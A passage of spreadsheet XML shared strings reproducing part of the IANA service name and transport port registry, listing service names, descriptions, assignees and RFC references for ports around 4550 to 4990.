    <t>[RFC3103]</t>
  </si>
  <si>
    <t>dtn-bundle</t>
  </si>
  <si>
    <t>DTN Bundle TCP CL Protocol</t>
  </si>
  <si>
    <t>[Simon_Perreault]</t>
  </si>
  <si>
    <t>[RFC7242]</t>
  </si>
  <si>
    <t>DTN Bundle UDP CL Protocol</t>
  </si>
  <si>
    <t>DTN Bundle DCCP CL Protocol</t>
  </si>
  <si>
    <t>mtcevrunqss</t>
  </si>
  <si>
    <t>Marathon everRun Quorum Service Server</t>
  </si>
  <si>
    <t>[David_Schwartz_2]</t>
  </si>
  <si>
    <t>mtcevrunqman</t>
  </si>
  <si>
    <t>Marathon everRun Quorum Service Manager</t>
  </si>
  <si>
    <t>hylafax</t>
  </si>
  <si>
    <t>HylaFAX</t>
  </si>
  <si>
    <t>[Lee_Howard]</t>
  </si>
  <si>
    <t>4560-4562</t>
  </si>
  <si>
    <t>amahi-anywhere</t>
  </si>
  <si>
    <t>Amahi Anywhere</t>
  </si>
  <si>
    <t>[Amahi]</t>
  </si>
  <si>
    <t>[Carlos_Puchol]</t>
  </si>
  <si>
    <t>4564-4565</t>
  </si>
  <si>
    <t>kwtc</t>
  </si>
  <si>
    <t>Kids Watch Time Control Service</t>
  </si>
  <si>
    <t>[Larry_Zarou]</t>
  </si>
  <si>
    <t>tram</t>
  </si>
  <si>
    <t>TRAM</t>
  </si>
  <si>
    <t>[Joe_Wesley]</t>
  </si>
  <si>
    <t>bmc-reporting</t>
  </si>
  <si>
    <t>BMC Reporting</t>
  </si>
  <si>
    <t>iax</t>
  </si>
  <si>
    <t>Inter-Asterisk eXchange</t>
  </si>
  <si>
    <t>[Benjamin_Kowarsch]</t>
  </si>
  <si>
    <t>[RFC5456]</t>
  </si>
  <si>
    <t>Defined TXT keys:
  auth          plaintext | md5 | rsakeys
  userid        alphanumeric, additionally '_', '+', '-'
  secret        any printable ASCII characters
  domain        any DNS domain name or IP address
  extension     alphanumeric, additionally '*', '#', '_', '+', '-'
  context       alphanumeric, additionally '_', '+', '-'
  trunk         yes | no | 0 | 1
  welcome       alphanumeric, additionally '*', '#', '_', '+', '-'
  voicemail     alphanumeric, additionally '*', '#', '_', '+', '-'
  reception     alphanumeric, additionally '*', '#', '_', '+', '-'
  echotest      alphanumeric, additionally '*', '#', '_', '+', '-'
  ivrtest       alphanumeric, additionally '*', '#', '_', '+', '-'
All of these TXT record keys are optional, they may be omitted.
Further keys may be added in the future.</t>
  </si>
  <si>
    <t>deploymentmap</t>
  </si>
  <si>
    <t>Service to distribute and update within a site deployment information for Oracle Communications Suite</t>
  </si>
  <si>
    <t>[Oracle_3]</t>
  </si>
  <si>
    <t>[Dan_Newman]</t>
  </si>
  <si>
    <t>4571-4572</t>
  </si>
  <si>
    <t>cardifftec-back</t>
  </si>
  <si>
    <t>A port for communication between a server and client for a custom backup system</t>
  </si>
  <si>
    <t>[CardiffTec]</t>
  </si>
  <si>
    <t>[Benjamin_Misell]</t>
  </si>
  <si>
    <t>4574-4589</t>
  </si>
  <si>
    <t>rid</t>
  </si>
  <si>
    <t>RID over HTTP/TLS</t>
  </si>
  <si>
    <t>[RFC6546]</t>
  </si>
  <si>
    <t>l3t-at-an</t>
  </si>
  <si>
    <t>HRPD L3T (AT-AN)</t>
  </si>
  <si>
    <t>[Avi_Lior]</t>
  </si>
  <si>
    <t>hrpd-ith-at-an</t>
  </si>
  <si>
    <t>HRPD-ITH (AT-AN)</t>
  </si>
  <si>
    <t>ipt-anri-anri</t>
  </si>
  <si>
    <t>IPT (ANRI-ANRI)</t>
  </si>
  <si>
    <t>ias-session</t>
  </si>
  <si>
    <t>IAS-Session (ANRI-ANRI)</t>
  </si>
  <si>
    <t>ias-paging</t>
  </si>
  <si>
    <t>IAS-Paging (ANRI-ANRI)</t>
  </si>
  <si>
    <t>ias-neighbor</t>
  </si>
  <si>
    <t>IAS-Neighbor (ANRI-ANRI)</t>
  </si>
  <si>
    <t>a21-an-1xbs</t>
  </si>
  <si>
    <t>A21 (AN-1xBS)</t>
  </si>
  <si>
    <t>a16-an-an</t>
  </si>
  <si>
    <t>A16 (AN-AN)</t>
  </si>
  <si>
    <t>a17-an-an</t>
  </si>
  <si>
    <t>A17 (AN-AN)</t>
  </si>
  <si>
    <t>piranha1</t>
  </si>
  <si>
    <t>Piranha1</t>
  </si>
  <si>
    <t>piranha2</t>
  </si>
  <si>
    <t>Piranha2</t>
  </si>
  <si>
    <t>[Primark_Corporation]</t>
  </si>
  <si>
    <t>mtsserver</t>
  </si>
  <si>
    <t>EAX MTS Server</t>
  </si>
  <si>
    <t>[Pedro_A_Rodriguez]</t>
  </si>
  <si>
    <t>menandmice-upg</t>
  </si>
  <si>
    <t>Men &amp; Mice Upgrade Agent</t>
  </si>
  <si>
    <t>[Eggert_Thorlacius_2]</t>
  </si>
  <si>
    <t>irp</t>
  </si>
  <si>
    <t>Identity Registration Protocol</t>
  </si>
  <si>
    <t>[Sixscape_Communications_Pte_Ltd]</t>
  </si>
  <si>
    <t>[Lawrence_E._Hughes]</t>
  </si>
  <si>
    <t>sixchat</t>
  </si>
  <si>
    <t>Direct End to End Secure Chat Protocol</t>
  </si>
  <si>
    <t>sixid</t>
  </si>
  <si>
    <t>Secure ID to IP registration and lookup</t>
  </si>
  <si>
    <t>4607-4620</t>
  </si>
  <si>
    <t>ventoso</t>
  </si>
  <si>
    <t>Bidirectional single port remote radio VOIP and Control stream</t>
  </si>
  <si>
    <t>[Ventoso_Integrated_Peripherals]</t>
  </si>
  <si>
    <t>[John_Lindsey]</t>
  </si>
  <si>
    <t>4622-4645</t>
  </si>
  <si>
    <t>dots-signal</t>
  </si>
  <si>
    <t>Distributed Denial-of-Service Open Threat Signaling (DOTS) Signal Channel</t>
  </si>
  <si>
    <t>[RFC8782]</t>
  </si>
  <si>
    <t>4647-4657</t>
  </si>
  <si>
    <t>playsta2-app</t>
  </si>
  <si>
    <t>PlayStation2 App Port</t>
  </si>
  <si>
    <t>playsta2-lob</t>
  </si>
  <si>
    <t>PlayStation2 Lobby Port</t>
  </si>
  <si>
    <t>[Noam_Rimon]</t>
  </si>
  <si>
    <t>smaclmgr</t>
  </si>
  <si>
    <t>[Hiromi_Taki]</t>
  </si>
  <si>
    <t>kar2ouche</t>
  </si>
  <si>
    <t>Kar2ouche Peer location service</t>
  </si>
  <si>
    <t>[Andy_Krouwel]</t>
  </si>
  <si>
    <t>oms</t>
  </si>
  <si>
    <t>OrbitNet Message Service</t>
  </si>
  <si>
    <t>[Roy_Davies]</t>
  </si>
  <si>
    <t>noteit</t>
  </si>
  <si>
    <t>Note It! Message Service</t>
  </si>
  <si>
    <t>[Pedro_Alpedrinha]</t>
  </si>
  <si>
    <t>ems</t>
  </si>
  <si>
    <t>Rimage Messaging Server</t>
  </si>
  <si>
    <t>[David_V_Raskin]</t>
  </si>
  <si>
    <t>contclientms</t>
  </si>
  <si>
    <t>Container Client Message Service</t>
  </si>
  <si>
    <t>[Bruce_Thompson]</t>
  </si>
  <si>
    <t>eportcomm</t>
  </si>
  <si>
    <t>E-Port Message Service</t>
  </si>
  <si>
    <t>mmacomm</t>
  </si>
  <si>
    <t>MMA Comm Services</t>
  </si>
  <si>
    <t>mmaeds</t>
  </si>
  <si>
    <t>MMA EDS Service</t>
  </si>
  <si>
    <t>[Robert_Shaffer]</t>
  </si>
  <si>
    <t>eportcommdata</t>
  </si>
  <si>
    <t>E-Port Data Service</t>
  </si>
  <si>
    <t>light</t>
  </si>
  <si>
    <t>Light packets transfer protocol</t>
  </si>
  <si>
    <t>[Adam_Golovenko]</t>
  </si>
  <si>
    <t>acter</t>
  </si>
  <si>
    <t>Bull RSF action server</t>
  </si>
  <si>
    <t>[Christian_Caudrelier]</t>
  </si>
  <si>
    <t>rfa</t>
  </si>
  <si>
    <t>remote file access server</t>
  </si>
  <si>
    <t>cxws</t>
  </si>
  <si>
    <t>CXWS Operations</t>
  </si>
  <si>
    <t>[Phil_Abercrombie]</t>
  </si>
  <si>
    <t>appiq-mgmt</t>
  </si>
  <si>
    <t>AppIQ Agent Management</t>
  </si>
  <si>
    <t>dhct-status</t>
  </si>
  <si>
    <t>BIAP Device Status</t>
  </si>
  <si>
    <t>dhct-alerts</t>
  </si>
  <si>
    <t>BIAP Generic Alert</t>
  </si>
  <si>
    <t>bcs</t>
  </si>
  <si>
    <t>Business Continuity Servi</t>
  </si>
  <si>
    <t>[Siew_Sim]</t>
  </si>
  <si>
    <t>traversal</t>
  </si>
  <si>
    <t>boundary traversal</t>
  </si>
  <si>
    <t>[Kevin_Lu]</t>
  </si>
  <si>
    <t>mgesupervision</t>
  </si>
  <si>
    <t>MGE UPS Supervision</t>
  </si>
  <si>
    <t>mgemanagement</t>
  </si>
  <si>
    <t>MGE UPS Management</t>
  </si>
  <si>
    <t>[Lecuivre_J]</t>
  </si>
  <si>
    <t>parliant</t>
  </si>
  <si>
    <t>Parliant Telephony System</t>
  </si>
  <si>
    <t>[Colin_Henein]</t>
  </si>
  <si>
    <t>finisar</t>
  </si>
  <si>
    <t>[Christina_Mercier]</t>
  </si>
  <si>
    <t>spike</t>
  </si>
  <si>
    <t>Spike Clipboard Service</t>
  </si>
  <si>
    <t>[Scott_Herscher]</t>
  </si>
  <si>
    <t>rfid-rp1</t>
  </si>
  <si>
    <t>RFID Reader Protocol 1.0</t>
  </si>
  <si>
    <t>[Michael_Mealling_2]</t>
  </si>
  <si>
    <t>autopac</t>
  </si>
  <si>
    <t>Autopac Protocol</t>
  </si>
  <si>
    <t>[Peter_Hallenbeck]</t>
  </si>
  <si>
    <t>msp-os</t>
  </si>
  <si>
    <t>Manina Service Protocol</t>
  </si>
  <si>
    <t>[Markus_Nix]</t>
  </si>
  <si>
    <t>nst</t>
  </si>
  <si>
    <t>Network Scanner Tool FTP</t>
  </si>
  <si>
    <t>[Mala_Bhat]</t>
  </si>
  <si>
    <t>mobile-p2p</t>
  </si>
  <si>
    <t>Mobile P2P Service</t>
  </si>
  <si>
    <t>[Hanz_Hager]</t>
  </si>
  <si>
    <t>altovacentral</t>
  </si>
  <si>
    <t>Altova DatabaseCentral</t>
  </si>
  <si>
    <t>[Altova]</t>
  </si>
  <si>
    <t>prelude</t>
  </si>
  <si>
    <t>Prelude IDS message proto</t>
  </si>
  <si>
    <t>[Yoann_Vandoorselaere]</t>
  </si>
  <si>
    <t>mtn</t>
  </si>
  <si>
    <t>monotone Netsync Protocol</t>
  </si>
  <si>
    <t>[Thomas_Keller]</t>
  </si>
  <si>
    <t>conspiracy</t>
  </si>
  <si>
    <t>Conspiracy messaging</t>
  </si>
  <si>
    <t>4693-4699</t>
  </si>
  <si>
    <t>netxms-agent</t>
  </si>
  <si>
    <t>NetXMS Agent</t>
  </si>
  <si>
    <t>netxms-mgmt</t>
  </si>
  <si>
    <t>NetXMS Management</t>
  </si>
  <si>
    <t>netxms-sync</t>
  </si>
  <si>
    <t>NetXMS Server Synchronization</t>
  </si>
  <si>
    <t>[Victor_Kirhenshtein]</t>
  </si>
  <si>
    <t>npqes-test</t>
  </si>
  <si>
    <t>Network Performance Quality Evaluation System Test Service</t>
  </si>
  <si>
    <t>[Zhengli]</t>
  </si>
  <si>
    <t>assuria-ins</t>
  </si>
  <si>
    <t>Assuria Insider</t>
  </si>
  <si>
    <t>4705-4710</t>
  </si>
  <si>
    <t>trinity-dist</t>
  </si>
  <si>
    <t>Trinity Trust Network Node Communication</t>
  </si>
  <si>
    <t>[P3KI_GmbH]</t>
  </si>
  <si>
    <t>[Gregor_Jehle]</t>
  </si>
  <si>
    <t>4712-4724</t>
  </si>
  <si>
    <t>truckstar</t>
  </si>
  <si>
    <t>TruckStar Service</t>
  </si>
  <si>
    <t>a26-fap-fgw</t>
  </si>
  <si>
    <t>A26 (FAP-FGW)</t>
  </si>
  <si>
    <t>fcis</t>
  </si>
  <si>
    <t>F-Link Client Information Service</t>
  </si>
  <si>
    <t>fcis-disc</t>
  </si>
  <si>
    <t>F-Link Client Information Service Discovery</t>
  </si>
  <si>
    <t>[Makoto_Zukawa]</t>
  </si>
  <si>
    <t>capmux</t>
  </si>
  <si>
    <t>CA Port Multiplexer</t>
  </si>
  <si>
    <t>[Nigel_Groves]</t>
  </si>
  <si>
    <t>gsmtap</t>
  </si>
  <si>
    <t>GSM Interface Tap</t>
  </si>
  <si>
    <t>gearman</t>
  </si>
  <si>
    <t>Gearman Job Queue System</t>
  </si>
  <si>
    <t>[Eric_Day]</t>
  </si>
  <si>
    <t>remcap</t>
  </si>
  <si>
    <t>Remote Capture Protocol</t>
  </si>
  <si>
    <t>[Marc_Donner]</t>
  </si>
  <si>
    <t>ohmtrigger</t>
  </si>
  <si>
    <t>OHM server trigger</t>
  </si>
  <si>
    <t>[Franck_Lefevre]</t>
  </si>
  <si>
    <t>resorcs</t>
  </si>
  <si>
    <t>RES Orchestration Catalog Services</t>
  </si>
  <si>
    <t>[Bob_Janssen_2]</t>
  </si>
  <si>
    <t>4734-4736</t>
  </si>
  <si>
    <t>ipdr-sp</t>
  </si>
  <si>
    <t>IPDR/SP</t>
  </si>
  <si>
    <t>[Ken_Sarno]</t>
  </si>
  <si>
    <t>solera-lpn</t>
  </si>
  <si>
    <t>SoleraTec Locator</t>
  </si>
  <si>
    <t>ipfix</t>
  </si>
  <si>
    <t>IP Flow Info Export</t>
  </si>
  <si>
    <t>[Nevil_Brownlee]</t>
  </si>
  <si>
    <t>ipfixs</t>
  </si>
  <si>
    <t>ipfix protocol over TLS</t>
  </si>
  <si>
    <t>ipfix protocol over DTLS</t>
  </si>
  <si>
    <t>lumimgrd</t>
  </si>
  <si>
    <t>Luminizer Manager</t>
  </si>
  <si>
    <t>[George_Hwa]</t>
  </si>
  <si>
    <t>sicct</t>
  </si>
  <si>
    <t>SICCT</t>
  </si>
  <si>
    <t>sicct-sdp</t>
  </si>
  <si>
    <t>SICCT Service Discovery Protocol</t>
  </si>
  <si>
    <t>[TeleTrusT_Deutschlan]</t>
  </si>
  <si>
    <t>openhpid</t>
  </si>
  <si>
    <t>openhpi HPI service</t>
  </si>
  <si>
    <t>[Thomas_Kanngieser]</t>
  </si>
  <si>
    <t>ifsp</t>
  </si>
  <si>
    <t>Internet File Synchronization Protocol</t>
  </si>
  <si>
    <t>[Alex_White]</t>
  </si>
  <si>
    <t>fmp</t>
  </si>
  <si>
    <t>Funambol Mobile Push</t>
  </si>
  <si>
    <t>[Andrea_Gazzaniga]</t>
  </si>
  <si>
    <t>intelliadm-disc</t>
  </si>
  <si>
    <t>IntelliAdmin Discovery</t>
  </si>
  <si>
    <t>[IntelliAdmin_LLC]</t>
  </si>
  <si>
    <t>[Steve_Wiseman]</t>
  </si>
  <si>
    <t>buschtrommel</t>
  </si>
  <si>
    <t>peer-to-peer file exchange protocol</t>
  </si>
  <si>
    <t>[None]</t>
  </si>
  <si>
    <t>[Tobias_Sturm]</t>
  </si>
  <si>
    <t>4748-4748</t>
  </si>
  <si>
    <t>profilemac</t>
  </si>
  <si>
    <t>Profile for Mac</t>
  </si>
  <si>
    <t>[David_Sinclair]</t>
  </si>
  <si>
    <t>ssad</t>
  </si>
  <si>
    <t>Simple Service Auto Discovery</t>
  </si>
  <si>
    <t>[Dr_Horst_Herb]</t>
  </si>
  <si>
    <t>spocp</t>
  </si>
  <si>
    <t>Simple Policy Control Protocol</t>
  </si>
  <si>
    <t>[Roland_Hedberg_2]</t>
  </si>
  <si>
    <t>snap</t>
  </si>
  <si>
    <t>Simple Network Audio Protocol</t>
  </si>
  <si>
    <t>[Dameon_Wagner]</t>
  </si>
  <si>
    <t>simon</t>
  </si>
  <si>
    <t>Simple Invocation of Methods Over Network (SIMON)</t>
  </si>
  <si>
    <t>[Alexander_Christian]</t>
  </si>
  <si>
    <t>simon-disc</t>
  </si>
  <si>
    <t>Simple Invocation of Methods Over Network (SIMON) Discovery</t>
  </si>
  <si>
    <t>gre-in-udp</t>
  </si>
  <si>
    <t>GRE-in-UDP Encapsulation</t>
  </si>
  <si>
    <t>[RFC8086]</t>
  </si>
  <si>
    <t>gre-udp-dtls</t>
  </si>
  <si>
    <t>GRE-in-UDP Encapsulation with DTLS</t>
  </si>
  <si>
    <t>RDCenter</t>
  </si>
  <si>
    <t>Reticle Decision Center</t>
  </si>
  <si>
    <t>[KLA_Tencor]</t>
  </si>
  <si>
    <t>4757-4773</t>
  </si>
  <si>
    <t>converge</t>
  </si>
  <si>
    <t>Converge RPC</t>
  </si>
  <si>
    <t>[Asteris_LLC]</t>
  </si>
  <si>
    <t>[Steven_Borrelli]</t>
  </si>
  <si>
    <t>4775-4783</t>
  </si>
  <si>
    <t>bfd-multi-ctl</t>
  </si>
  <si>
    <t>BFD Multihop Control</t>
  </si>
  <si>
    <t>[Dave_Katz][Dave_Ward]</t>
  </si>
  <si>
    <t>cncp</t>
  </si>
  <si>
    <t>Cisco Nexus Control Protocol</t>
  </si>
  <si>
    <t>[Joseph_Swaminathan]</t>
  </si>
  <si>
    <t>smart-install</t>
  </si>
  <si>
    <t>Smart Install Service</t>
  </si>
  <si>
    <t>[Amit_Nigam]</t>
  </si>
  <si>
    <t>sia-ctrl-plane</t>
  </si>
  <si>
    <t>Service Insertion Architecture (SIA) Control-Plane</t>
  </si>
  <si>
    <t>[Shree_Murthy]</t>
  </si>
  <si>
    <t>xmcp</t>
  </si>
  <si>
    <t>eXtensible Messaging Client Protocol</t>
  </si>
  <si>
    <t>[Cisco]</t>
  </si>
  <si>
    <t>[Glenn_Matthews]</t>
  </si>
  <si>
    <t>Defined TXT keys:     txtvers=1 (as described in the draft)
      protovers=&lt;comma-separated list of major/minor versions supported&gt;
(examples: "protovers=1.0" "protovers=1.1,2.0"</t>
  </si>
  <si>
    <t>vxlan</t>
  </si>
  <si>
    <t>Virtual eXtensible Local Area Network (VXLAN)</t>
  </si>
  <si>
    <t>[Lawrence_Kreeger]</t>
  </si>
  <si>
    <t>[RFC7348]</t>
  </si>
  <si>
    <t>vxlan-gpe</t>
  </si>
  <si>
    <t>Generic Protocol Extension for Virtual eXtensible Local Area Network (VXLAN)</t>
  </si>
  <si>
    <t>roce</t>
  </si>
  <si>
    <t>IP Routable RocE</t>
  </si>
  <si>
    <t>[InfiniBand_Trade_Association]</t>
  </si>
  <si>
    <t>[Diego_Crupnicoff]</t>
  </si>
  <si>
    <t>4792-4799</t>
  </si>
  <si>
    <t>iims</t>
  </si>
  <si>
    <t>Icona Instant Messenging System</t>
  </si>
  <si>
    <t>iwec</t>
  </si>
  <si>
    <t>Icona Web Embedded Chat</t>
  </si>
  <si>
    <t>ilss</t>
  </si>
  <si>
    <t>Icona License System Server</t>
  </si>
  <si>
    <t>[Paul_Stephen_Borlie]</t>
  </si>
  <si>
    <t>notateit</t>
  </si>
  <si>
    <t>Notateit Messaging</t>
  </si>
  <si>
    <t>notateit-disc</t>
  </si>
  <si>
    <t>Notateit Messaging Discovery</t>
  </si>
  <si>
    <t>[Ean_Black]</t>
  </si>
  <si>
    <t>aja-ntv4-disc</t>
  </si>
  <si>
    <t>AJA ntv4 Video System Discovery</t>
  </si>
  <si>
    <t>[Mike_Bernadett]</t>
  </si>
  <si>
    <t>4805-4826</t>
  </si>
  <si>
    <t>htcp</t>
  </si>
  <si>
    <t>HTCP</t>
  </si>
  <si>
    <t>[Paul_Vixie]</t>
  </si>
  <si>
    <t>4828-4836</t>
  </si>
  <si>
    <t>varadero-0</t>
  </si>
  <si>
    <t>Varadero-0</t>
  </si>
  <si>
    <t>varadero-1</t>
  </si>
  <si>
    <t>Varadero-1</t>
  </si>
  <si>
    <t>varadero-2</t>
  </si>
  <si>
    <t>Varadero-2</t>
  </si>
  <si>
    <t>[Carlos_Arteaga]</t>
  </si>
  <si>
    <t>opcua-tcp</t>
  </si>
  <si>
    <t>OPC UA Connection Protocol</t>
  </si>
  <si>
    <t>[OPC_Foundation]</t>
  </si>
  <si>
    <t>[Randy_Armstrong]</t>
  </si>
  <si>
    <t>opcua-udp</t>
  </si>
  <si>
    <t>OPC UA Multicast Datagram Protocol</t>
  </si>
  <si>
    <t>quosa</t>
  </si>
  <si>
    <t>QUOSA Virtual Library Service</t>
  </si>
  <si>
    <t>[Uri_Blank]</t>
  </si>
  <si>
    <t>gw-asv</t>
  </si>
  <si>
    <t>nCode ICE-flow Library AppServer</t>
  </si>
  <si>
    <t>[Ross_Swithenbank]</t>
  </si>
  <si>
    <t>opcua-tls</t>
  </si>
  <si>
    <t>OPC UA TCP Protocol over TLS/SSL</t>
  </si>
  <si>
    <t>gw-log</t>
  </si>
  <si>
    <t>nCode ICE-flow Library LogServer</t>
  </si>
  <si>
    <t>wcr-remlib</t>
  </si>
  <si>
    <t>WordCruncher Remote Library Service</t>
  </si>
  <si>
    <t>[Jason_Dzubak]</t>
  </si>
  <si>
    <t>contamac-icm</t>
  </si>
  <si>
    <t>Contamac ICM Service
IANA assigned this well-formed service name as a replacement for "contamac_icm".</t>
  </si>
  <si>
    <t>[Abdullah_Obeid]</t>
  </si>
  <si>
    <t>contamac_icm</t>
  </si>
  <si>
    <t>Contamac ICM Service</t>
  </si>
  <si>
    <t>This entry is an alias to "contamac-icm".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>wfc</t>
  </si>
  <si>
    <t>Web Fresh Communication</t>
  </si>
  <si>
    <t>[Jonathan_Bastnagel]</t>
  </si>
  <si>
    <t>appserv-http</t>
  </si>
  <si>
    <t>App Server - Admin HTTP</t>
  </si>
  <si>
    <t>appserv-https</t>
  </si>
  <si>
    <t>App Server - Admin HTTPS</t>
  </si>
  <si>
    <t>[Sreeram_Duvvuru]</t>
  </si>
  <si>
    <t>sun-as-nodeagt</t>
  </si>
  <si>
    <t>Sun App Server - NA</t>
  </si>
  <si>
    <t>[Kedar_Mhaswade]</t>
  </si>
  <si>
    <t>derby-repli</t>
  </si>
  <si>
    <t>Apache Derby Replication</t>
  </si>
  <si>
    <t>[Jorgen_Loland]</t>
  </si>
  <si>
    <t>4852-4866</t>
  </si>
  <si>
    <t>unify-debug</t>
  </si>
  <si>
    <t>Unify Debugger</t>
  </si>
  <si>
    <t>phrelay</t>
  </si>
  <si>
    <t>Photon Relay</t>
  </si>
  <si>
    <t>phrelaydbg</t>
  </si>
  <si>
    <t>Photon Relay Debug</t>
  </si>
  <si>
    <t>cc-tracking</t>
  </si>
  <si>
    <t>Citcom Tracking Service</t>
  </si>
  <si>
    <t>[Wolfgang_Weidner]</t>
  </si>
  <si>
    <t>wired</t>
  </si>
  <si>
    <t>Wired</t>
  </si>
  <si>
    <t>[Axel_Andersson]</t>
  </si>
  <si>
    <t>4872-4875</t>
  </si>
  <si>
    <t>tritium-can</t>
  </si>
  <si>
    <t>Tritium CAN Bus Bridge Service</t>
  </si>
  <si>
    <t>[James_Kennedy]</t>
  </si>
  <si>
    <t>lmcs</t>
  </si>
  <si>
    <t>Lighting Management Control System</t>
  </si>
  <si>
    <t>[Timothy_Parry]</t>
  </si>
  <si>
    <t>inst-discovery</t>
  </si>
  <si>
    <t>Agilent Instrument Discovery</t>
  </si>
  <si>
    <t>[Charles_F_Steele]</t>
  </si>
  <si>
    <t>wsdl-event</t>
  </si>
  <si>
    <t>WSDL Event Receiver</t>
  </si>
  <si>
    <t>hislip</t>
  </si>
  <si>
    <t>IVI High-Speed LAN Instrument Protocol</t>
  </si>
  <si>
    <t>[Joe_Mueller]</t>
  </si>
  <si>
    <t>socp-t</t>
  </si>
  <si>
    <t>SOCP Time Synchronization Protocol</t>
  </si>
  <si>
    <t>[Joe_Haver]</t>
  </si>
  <si>
    <t>socp-c</t>
  </si>
  <si>
    <t>SOCP Control Protocol</t>
  </si>
  <si>
    <t>wmlserver</t>
  </si>
  <si>
    <t>Meier-Phelps License Server</t>
  </si>
  <si>
    <t>[William_Phelps]</t>
  </si>
  <si>
    <t>hivestor</t>
  </si>
  <si>
    <t>HiveStor Distributed File System</t>
  </si>
  <si>
    <t>[Nicholas_Young]</t>
  </si>
  <si>
    <t>abbs</t>
  </si>
  <si>
    <t>ABBS</t>
  </si>
  <si>
    <t>[Ryan_Rubley]</t>
  </si>
  <si>
    <t>4886-4887</t>
  </si>
  <si>
    <t>xcap-portal</t>
  </si>
  <si>
    <t>xcap code analysis portal public user access</t>
  </si>
  <si>
    <t>[_88solutions_Corporation]</t>
  </si>
  <si>
    <t>[Manfred_Koethe]</t>
  </si>
  <si>
    <t>xcap-control</t>
  </si>
  <si>
    <t>xcap code analysis portal cluster control and administration</t>
  </si>
  <si>
    <t>4890-4893</t>
  </si>
  <si>
    <t>lyskom</t>
  </si>
  <si>
    <t>LysKOM Protocol A</t>
  </si>
  <si>
    <t>[Per_Cederqvist]</t>
  </si>
  <si>
    <t>4895-4898</t>
  </si>
  <si>
    <t>radmin-port</t>
  </si>
  <si>
    <t>RAdmin Port</t>
  </si>
  <si>
    <t>[Dmitri_Znosko]</t>
  </si>
  <si>
    <t>hfcs</t>
  </si>
  <si>
    <t>HFSQL Client/Server Database Engine</t>
  </si>
  <si>
    <t>[PC_SOFT]</t>
  </si>
  <si>
    <t>[Jerome_AERTS_2]</t>
  </si>
  <si>
    <t>flr-agent</t>
  </si>
  <si>
    <t>FileLocator Remote Search Agent
IANA assigned this well-formed service name as a replacement for "flr_agent".</t>
  </si>
  <si>
    <t>[David_Vest]</t>
  </si>
  <si>
    <t>flr_agent</t>
  </si>
  <si>
    <t>FileLocator Remote Search Agent</t>
  </si>
  <si>
    <t>This entry is an alias to "flr-agent".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>magiccontrol</t>
  </si>
  <si>
    <t>magicCONROL RF and Data Interface</t>
  </si>
  <si>
    <t>[Andreas_Spalenski]</t>
  </si>
  <si>
    <t>4903-4911</t>
  </si>
  <si>
    <t>lutap</t>
  </si>
  <si>
    <t>Technicolor LUT Access Protocol</t>
  </si>
  <si>
    <t>[Markus_Loeffler]</t>
  </si>
  <si>
    <t>lutcp</t>
  </si>
  <si>
    <t>LUTher Control Protocol</t>
  </si>
  <si>
    <t>bones</t>
  </si>
  <si>
    <t>Bones Remote Control</t>
  </si>
  <si>
    <t>[Andreas_Foedrowitz]</t>
  </si>
  <si>
    <t>frcs</t>
  </si>
  <si>
    <t>Fibics Remote Control Service</t>
  </si>
  <si>
    <t>[Ken_Lagarec]</t>
  </si>
  <si>
    <t>4916-4935</t>
  </si>
  <si>
    <t>an-signaling</t>
  </si>
  <si>
    <t>Signal protocol port for autonomic networking</t>
  </si>
  <si>
    <t>[Cisco_systems_3]</t>
  </si>
  <si>
    <t>[Toerless_Eckert_2]</t>
  </si>
  <si>
    <t>atsc-mh-ssc</t>
  </si>
  <si>
    <t>ATSC-M/H Service Signaling Channel</t>
  </si>
  <si>
    <t>[Jerry_Whitaker]</t>
  </si>
  <si>
    <t>4938-4939</t>
  </si>
  <si>
    <t>eq-office-4940</t>
  </si>
  <si>
    <t>Equitrac Office</t>
  </si>
  <si>
    <t>eq-office-4941</t>
  </si>
  <si>
    <t>eq-office-4942</t>
  </si>
  <si>
    <t>[Tom_Haapanen_2]</t>
  </si>
  <si>
    <t>4943-4948</t>
  </si>
  <si>
    <t>munin</t>
  </si>
  <si>
    <t>Munin Graphing Framework</t>
  </si>
  <si>
    <t>[Jimmy_Olsen]</t>
  </si>
  <si>
    <t>sybasesrvmon</t>
  </si>
  <si>
    <t>Sybase Server Monitor</t>
  </si>
  <si>
    <t>[Chris_Irie]</t>
  </si>
  <si>
    <t>pwgwims</t>
  </si>
  <si>
    <t>PWG WIMS</t>
  </si>
  <si>
    <t>sagxtsds</t>
  </si>
  <si>
    <t>SAG Directory Server</t>
  </si>
  <si>
    <t>[Michael_Chirila]</t>
  </si>
  <si>
    <t>dbsyncarbiter</t>
  </si>
  <si>
    <t>Synchronization Arbiter</t>
  </si>
  <si>
    <t>[Dave_Neudoerffer_2]</t>
  </si>
  <si>
    <t>4954-4968</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: port 4967</t>
  </si>
  <si>
    <t>ccss-qmm</t>
  </si>
  <si>
    <t>CCSS QMessageMonitor</t>
  </si>
  <si>
    <t>ccss-qsm</t>
  </si>
  <si>
    <t>CCSS QSystemMonitor</t>
  </si>
  <si>
    <t>[David_Young]</t>
  </si>
  <si>
    <t>burp</t>
  </si>
  <si>
    <t>BackUp and Restore Program</t>
  </si>
  <si>
    <t>[Marat_Khalili]</t>
  </si>
  <si>
    <t>4972-4979</t>
  </si>
  <si>
    <t>ctxs-vpp</t>
  </si>
  <si>
    <t>Citrix Virtual Path</t>
  </si>
  <si>
    <t>[Citrix_Systems]</t>
  </si>
  <si>
    <t>[Rohith_Ramkumar]</t>
  </si>
  <si>
    <t>4981-4982</t>
  </si>
  <si>
    <t>webyast</t>
  </si>
  <si>
    <t>WebYast</t>
  </si>
  <si>
    <t>[Federico_Lucifredi]</t>
  </si>
  <si>
    <t>gerhcs</t>
  </si>
  <si>
    <t>GER HC Standard</t>
  </si>
  <si>
    <t>[Roger_Ward]</t>
  </si>
  <si>
    <t>mrip</t>
  </si>
  <si>
    <t>Model Railway Interface Program</t>
  </si>
  <si>
    <t>[Howard_Amos]</t>
  </si>
  <si>
    <t>smar-se-port1</t>
  </si>
  <si>
    <t>SMAR Ethernet Port 1</t>
  </si>
  <si>
    <t>smar-se-port2</t>
  </si>
  <si>
    <t>SMAR Ethernet Port 2</t>
  </si>
  <si>
    <t>[Delcio_Prizon]</t>
  </si>
  <si>
    <t>parallel</t>
  </si>
  <si>
    <t>Parallel for GAUSS (tm)</t>
  </si>
  <si>
    <t>[Matthew_Ford]</t>
  </si>
  <si>
    <t>busycal</t>
  </si>
  <si>
